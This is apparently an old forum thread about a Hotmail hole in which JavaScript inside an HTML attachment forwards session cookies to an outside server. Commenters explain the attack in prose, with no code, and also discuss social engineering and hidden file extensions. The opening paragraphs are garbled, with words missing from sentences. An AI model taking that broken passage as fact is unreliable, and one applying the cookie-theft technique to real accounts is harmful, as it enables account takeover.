Another Hole in Hotmail

Ancipital noted that a new hotmail hole has sprung up. This one is, like the ILUVYOU bug, a VBS macro attachment that must be executed by people with very (ok, who does this, huh? I mean, viewing a gif or clicking a URL, but running a strange program? The mind boggles).

Hotmail did.

I thought this story was quite. Besides being, it was to read! I wonder why Microsoft can't get off, and implement.

This is not, the JavaScript exploit in existence! Microsoft should, otherwise the users. The mind boggles.

But then again, I rarely. So who. Well!

A Brief Explanation for the lazy

[CiaranMc]

How this seems to work is that someone emails you an HTML file as an attachment.

If you then view the attachment through Hotmail, Javascript in that attachment can then pretend to me from the Hotmail domain, and therefore access any cookies that Hotmail has set up. It can then submit these values to a form on another, hostile, server.

These cookies then allow access to the site from a user pretending to be you, allowing them to read and delete your emails or send email from your account.

It's not clear form the article, but presumably the relevant cookie is the one holding the user's session key. In a typical implementation this key will be useless after 30mins or so, but the length of the timeout is really whatever Microsoft chooses it to be.

Try logging on to Hotmail, not touching anything for 30 mins and then clicking on 'read mail'. If they have the server set up sensibly, you'll have to enter your user name and password again.

On the other hand, if Microsoft have done something really really dumb, like including the password in a cookie, then there's really no hoe for them.

-Ciaran

I can't resist...someone has to say it.

[hal200]

C is for cookie, that's good enough for me!

Ah. I feel MUCH better now! Now I have to go delete some email before I lose my cookies! <grin>

Formatting the same as erasing?

[LordNimon]

Your post underscores the fact that many technical people have forgotton the original meaning of the words they use. It's really a shame.

To you and me, formatting means erasing. But that's only true in techno-speak. In every other context, the word "format" does not imply erasing - not at all! And since very few people actually format their hard drives (and hence, have no experience with the process), how can you expect them to know what that word means?

When you "format" something, you arrange it. You put it into some kind of order. To most people, that's a good thing! The moron who decided that "format" is a synonym for "erase" should be shot.

If your application had asked the user to "erase all files on your hard drive", I think very few people would have said yes.

Social Engineering is easier

[zpengo]

I've seen websites that claim to give people access to anyone's Hotmail account. All you have to do is send an e-mail to a particular address that looks valid (something like account-password@hotmail.com) and give them the login of the person whose acct you want to get into, as well as your own login and password.

I wonder how many people fell into that trap, thinking they were gonna get into someone else's account.

You'd be surprised.

[RavenWolf]

I wrote a little "application" that was a simple little dialog box that asked the user if he wished to format the hard drive (in so many words) to see just how many of our in-house users really read those messages - and attached it to an email sent to everyone in the office (around 150 users). (Results were then sent to my computer through TCP connection, for those interested) 1 out of 3 users clicked yes..

File extensions

[Chris+Hiner]

What alot of us forget, is that Windows 95 defaults to not showing the extension for files it knows the type of. So if you name a file NIFTY_PICTURE.GIF.VBS, alot of non technical people will see it as NIFTY_PICTURE.GIF. But when they double click it, it runs...
(Win98 may default to this too, I don't remember)

I suspect lots of nongeeks leave it at the default...

Re:question about the above statement

[Erasmus+Darwin]

It's not the grammar that bothers me, so much as the inaccuracy of the summary. It isn't a VBS attachment that causes the problem, but rather a plain HTML attachment with embedded javascript. Even in a world of "intelligent" users, HTML is expected to be a "safer" document format, rather than "dangerous" executable code.

I think there're a number of people you could assign the blame to, but no one entity that's "fully stupid". Users should be more careful, Hotmail should attempt some filtering, but most importantly the w3c should provide a means of denoting "third-party" HTML (and other documents) that appears to be from the server, but in reality was placed there by someone else (such as an attachment to an email or a comment in a message board that doesn't restrict HTML).

The acutal nature of the Hotmail hole

[sammy+baby]

Contrary to the reporting on /., the most recent Hotmail hole is in no way related to a VBS script. What's so alarming about the hole is that it is acutally an HTML file which contains the exploit. More specifically:

The folks over at Hotmail were smart enough to filter out JavaScript from HTML formatted messages sent to Hotmail recipients. They did not, however, think that it would be necessary to filter HTML attachments, either. As a result, a clever individual was able to construct an HTML page containing JavaScript which forwards HotMail authorization cookies to a third party.

Ironically, this information is largely reproduced from the article on Peacefire cited in the original post. No mention of VBS files anywhere.